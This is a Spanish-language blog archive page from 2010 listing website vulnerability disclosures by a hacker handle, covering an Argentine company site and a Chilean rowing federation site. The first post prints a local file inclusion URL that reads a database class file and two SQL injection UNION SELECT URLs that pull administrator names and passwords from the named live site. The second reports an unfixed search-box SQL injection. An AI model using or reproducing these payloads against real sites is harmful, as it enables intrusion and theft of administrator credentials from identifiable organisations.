janito24

Archive for 25 septiembre 2010|Monthly archive page

Vulnerabilidad www.almatec.com.ar

In Uncategorized on septiembre 25, 2010 at 8:32 pm

Sitio web: www.almatec.com.ar
Descubridor: Ari-Slash
URL del aviso:
Fecha de descubrimiento: 20 Enero 2010
Fecha de notificación: 20 de Enero 2010
Fecha de publicación: 25 de septiembre 2010
Arreglado: Si, pero ahora da lugar a un SQLI
Vulnerabilidad: LFI y SQLIInformacion adicional: el arreglo consistio en dar un id unico a cada archivo que se subia, de la forma download.php?id=
pero esa solucion dio lugar a sqli, siempre tomando el 2 campo del select debido a que debian retornarse cierta cantidad de columnas.

LFI (reparado):
www.almatec.com.ar/download.php?file=admin/includes/Class.DB.php

SQLI:
http://almatec.com.ar/descargas2.php?id=4%20union%20select%20id,nombre,password,4%20from%20administrador%20where%20id=1;–
http://almatec.com.ar/descargas2.php?id=4%20union%20select%20id,password,nombre,4%20from%20administrador%20where%20id=1;–

Federacion Chilena del Remo

In Uncategorized on septiembre 20, 2010 at 4:05 pm

Sitio web: http://www.federacionchilenaderemo.cl
Descubridor: Ari-Slash
URL del aviso: esta misma pagina xD
Fecha de descubrimiento: 20 de septiembre 2010
Fecha de notificación: 20 de septiembre 2010
Fecha de publicación: 20 de septiembre 2010
Arreglado: No
Vulnerabilidad: SQLI en el buscador